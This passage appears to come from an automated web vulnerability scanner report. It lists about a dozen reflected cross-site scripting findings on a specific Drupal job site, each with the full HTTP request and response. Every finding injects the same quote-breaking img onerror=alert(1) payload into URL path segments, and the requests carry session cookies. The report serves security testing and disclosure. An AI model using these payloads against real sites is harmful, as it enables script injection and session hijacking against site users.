Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:34:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:34:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="misc6db47"><img src=a onerror=alert(1)>44ae54b8308-drupal.js not-front not-logged-in page-misc6db47img-srca-onerroralert144ae54b8308 no-sidebars">
...[SNIP]...

3.27. http://jobs.ctg.eu/misc/drupal.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4212b"><img%20src%3da%20onerror%3dalert(1)>a9b9e94b7d6 was submitted in the REST URL parameter 2. This input was echoed as 4212b"><img src=a onerror=alert(1)>a9b9e94b7d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /misc/drupal.js4212b"><img%20src%3da%20onerror%3dalert(1)>a9b9e94b7d6?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="misc-drupal.js4212b"><img src=a onerror=alert(1)>a9b9e94b7d6 not-front not-logged-in page-misc no-sidebars">
...[SNIP]...

3.28. http://jobs.ctg.eu/misc/jquery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /misc/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40742"><img%20src%3da%20onerror%3dalert(1)>31ba6936dc0 was submitted in the REST URL parameter 1. This input was echoed as 40742"><img src=a onerror=alert(1)>31ba6936dc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /misc40742"><img%20src%3da%20onerror%3dalert(1)>31ba6936dc0/jquery.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="misc40742"><img src=a onerror=alert(1)>31ba6936dc0-jquery.js not-front not-logged-in page-misc40742img-srca-onerroralert131ba6936dc0 no-sidebars">
...[SNIP]...

3.29. http://jobs.ctg.eu/misc/jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /misc/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f59a7"><img%20src%3da%20onerror%3dalert(1)>a304b595f21 was submitted in the REST URL parameter 2. This input was echoed as f59a7"><img src=a onerror=alert(1)>a304b595f21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /misc/jquery.jsf59a7"><img%20src%3da%20onerror%3dalert(1)>a304b595f21?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="misc-jquery.jsf59a7"><img src=a onerror=alert(1)>a304b595f21 not-front not-logged-in page-misc no-sidebars">
...[SNIP]...

3.30. http://jobs.ctg.eu/modules/node/node.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2215b"><img%20src%3da%20onerror%3dalert(1)>082ddcb195 was submitted in the REST URL parameter 1. This input was echoed as 2215b"><img src=a onerror=alert(1)>082ddcb195 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules2215b"><img%20src%3da%20onerror%3dalert(1)>082ddcb195/node/node.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:30:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:30:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules2215b"><img src=a onerror=alert(1)>082ddcb195-node-node.css not-front not-logged-in page-modules2215bimg-srca-onerroralert1082ddcb195 no-sidebars">
...[SNIP]...

3.31. http://jobs.ctg.eu/modules/node/node.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6084"><img%20src%3da%20onerror%3dalert(1)>79d8aaa6a1b was submitted in the REST URL parameter 2. This input was echoed as c6084"><img src=a onerror=alert(1)>79d8aaa6a1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/nodec6084"><img%20src%3da%20onerror%3dalert(1)>79d8aaa6a1b/node.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:32:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:32:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-nodec6084"><img src=a onerror=alert(1)>79d8aaa6a1b-node.css not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.32. http://jobs.ctg.eu/modules/node/node.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36cfd"><img%20src%3da%20onerror%3dalert(1)>0112b661d83 was submitted in the REST URL parameter 3. This input was echoed as 36cfd"><img src=a onerror=alert(1)>0112b661d83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/node/node.css36cfd"><img%20src%3da%20onerror%3dalert(1)>0112b661d83?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-node-node.css36cfd"><img src=a onerror=alert(1)>0112b661d83 not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.33. http://jobs.ctg.eu/modules/system/defaults.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2480"><img%20src%3da%20onerror%3dalert(1)>6e90a398a07 was submitted in the REST URL parameter 1. This input was echoed as c2480"><img src=a onerror=alert(1)>6e90a398a07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modulesc2480"><img%20src%3da%20onerror%3dalert(1)>6e90a398a07/system/defaults.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:30:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:30:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modulesc2480"><img src=a onerror=alert(1)>6e90a398a07-system-defaults.css not-front not-logged-in page-modulesc2480img-srca-onerroralert16e90a398a07 no-sidebars">
...[SNIP]...

3.34. http://jobs.ctg.eu/modules/system/defaults.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b1b0"><img%20src%3da%20onerror%3dalert(1)>5dcfcce2e62 was submitted in the REST URL parameter 2. This input was echoed as 6b1b0"><img src=a onerror=alert(1)>5dcfcce2e62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/system6b1b0"><img%20src%3da%20onerror%3dalert(1)>5dcfcce2e62/defaults.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:32:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:32:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-system6b1b0"><img src=a onerror=alert(1)>5dcfcce2e62-defaults.css not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.35. http://jobs.ctg.eu/modules/system/defaults.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2fe"><img%20src%3da%20onerror%3dalert(1)>e5a5118278f was submitted in the REST URL parameter 3. This input was echoed as bb2fe"><img src=a onerror=alert(1)>e5a5118278f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/system/defaults.cssbb2fe"><img%20src%3da%20onerror%3dalert(1)>e5a5118278f?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-system-defaults.cssbb2fe"><img src=a onerror=alert(1)>e5a5118278f not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.36. http://jobs.ctg.eu/modules/system/system-menus.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beda8"><img%20src%3da%20onerror%3dalert(1)>6e4c1ce2860 was submitted in the REST URL parameter 1. This input was echoed as beda8"><img src=a onerror=alert(1)>6e4c1ce2860 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modulesbeda8"><img%20src%3da%20onerror%3dalert(1)>6e4c1ce2860/system/system-menus.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:30:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:30:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modulesbeda8"><img src=a onerror=alert(1)>6e4c1ce2860-system-system-menus.css not-front not-logged-in page-modulesbeda8img-srca-onerroralert16e4c1ce2860 no-sidebars">
...[SNIP]...

3.37. http://jobs.ctg.eu/modules/system/system-menus.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93062"><img%20src%3da%20onerror%3dalert(1)>1f99fd27bf was submitted in the REST URL parameter 2. This input was echoed as 93062"><img src=a onerror=alert(1)>1f99fd27bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/system93062"><img%20src%3da%20onerror%3dalert(1)>1f99fd27bf/system-menus.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:32:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:32:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-system93062"><img src=a onerror=alert(1)>1f99fd27bf-system-menus.css not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.38. http://jobs.ctg.eu/modules/system/system-menus.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91038"><img%20src%3da%20onerror%3dalert(1)>24b23078d8b was submitted in the REST URL parameter 3. This input was echoed as 91038"><img src=a onerror=alert(1)>24b23078d8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/system/system-menus.css91038"><img%20src%3da%20onerror%3dalert(1)>24b23078d8b?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:17 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-system-system-menus.css91038"><img src=a onerror=alert(1)>24b23078d8b not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.39. http://jobs.ctg.eu/modules/system/system.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a02d"><img%20src%3da%20onerror%3dalert(1)>ae1a910df3b was submitted in the REST URL parameter 1. This input was echoed as 1a02d"><img src=a onerror=alert(1)>ae1a910df3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules1a02d"><img%20src%3da%20onerror%3dalert(1)>ae1a910df3b/system/system.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:30:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:30:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules1a02d"><img src=a onerror=alert(1)>ae1a910df3b-system-system.css not-front not-logged-in page-modules1a02dimg-srca-onerroralert1ae1a910df3b no-sidebars">
...[SNIP]...

3.40. http://jobs.ctg.eu/modules/system/system.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/system.css

Issue detail

